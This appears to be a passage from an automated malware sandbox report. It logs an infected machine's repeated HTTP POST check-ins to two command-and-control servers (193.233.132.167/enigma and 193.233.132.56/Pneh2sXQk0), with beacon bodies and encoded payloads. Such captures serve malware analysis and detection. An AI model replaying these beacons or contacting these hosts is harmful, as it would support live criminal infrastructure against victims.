                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:31.585488081 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP  Source Port  Destination IP  Destination Port
1427  192.168.2.5  51282  193.233.132.167  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:31.802980900 CEST  155  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:32.046503067 CEST  197  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP  Source Port  Destination IP  Destination Port
1428  192.168.2.5  51283  193.233.132.56  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:31.911051035 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:32.153614044 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP  Source Port  Destination IP  Destination Port
1429  192.168.2.5  51284  193.233.132.167  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:32.292921066 CEST  309  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:32.540616989 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP  Source Port  Destination IP  Destination Port
1430  192.168.2.5  51285  193.233.132.56  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:32.405694962 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:32.654869080 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1431 | 192.168.2.5 | 51286 | 193.233.132.167 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:32.883845091 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:33.125235081 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1432 | 192.168.2.5 | 51287 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:32.980370045 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:33.228178978 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1433 | 192.168.2.5 | 51288 | 193.233.132.167 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:33.383054972 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:33.638498068 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1434 | 192.168.2.5 | 51289 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:33.479418039 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:33.727906942 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      1435 | 192.168.2.5 | 51290 | 193.233.132.167 | 80 | 2956 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:33.987055063 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:34.237394094 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1436 | 192.168.2.5 | 51291 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:34.053054094 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:34.295047045 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1437        192.168.2.5  51292        193.233.132.167  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:34.486393929 CEST  309  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:34.734529018 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1438        192.168.2.5  51293        193.233.132.56   80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:34.545939922 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:34.798774004 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1439        192.168.2.5  51294        193.233.132.167  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:35.085906982 CEST  155  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:35.331721067 CEST  197  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1440        192.168.2.5  51295        193.233.132.56   80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:35.131383896 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:35.376146078 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1441        192.168.2.5  51296        193.233.132.167  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:35.590260983 CEST  309  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:35.844428062 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1442        192.168.2.5  51297        193.233.132.56   80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:35.619990110 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:35.861323118 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP  Source Port  Destination IP  Destination Port
1443  192.168.2.5  51298  193.233.132.167  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:36.182342052 CEST  155  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:36.430226088 CEST  197  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


